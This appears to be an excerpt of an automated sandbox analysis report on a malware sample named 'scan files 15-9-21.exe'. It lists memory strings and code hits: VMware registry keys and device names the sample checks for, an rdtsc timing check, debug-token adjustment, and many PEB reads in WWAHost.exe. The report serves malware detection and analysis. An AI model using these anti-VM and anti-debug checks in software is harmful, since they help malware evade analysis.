          Source: explorer.exe, 00000003.00000000.275972062.000000000ECF0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.274227588.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000003.00000000.274227588.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.267087744.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.274140745.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000003.00000000.274227588.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000003.00000000.274140745.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.292230436.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03693B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03693B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03738F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03738B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03664F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03664F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0372131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0373070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0373070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03735BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03671B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03671B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0371D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03678794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0372138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03692397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0371B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0371B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03738A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0371FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03698E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03678A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03683A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03692AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03692ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03738ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0371FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03687D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03738D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03684120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03718DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03692990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03722073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0368746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03731074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03680050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03680050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03734015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03734015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036E7016 mov eax, dword ptr fs:[00000030h]
